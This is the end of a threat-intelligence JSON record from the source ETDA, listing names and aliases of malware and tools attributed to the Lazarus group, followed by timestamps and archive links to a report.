				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434501,
	"ts_updated_at": 1775792299,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f5d2a4fefd726cf1f371446b00cc2bad32e15737.pdf",
		"text": "https://archive.orkl.eu/f5d2a4fefd726cf1f371446b00cc2bad32e15737.txt",
		"img": "https://archive.orkl.eu/f5d2a4fefd726cf1f371446b00cc2bad32e15737.jpg"
	}
}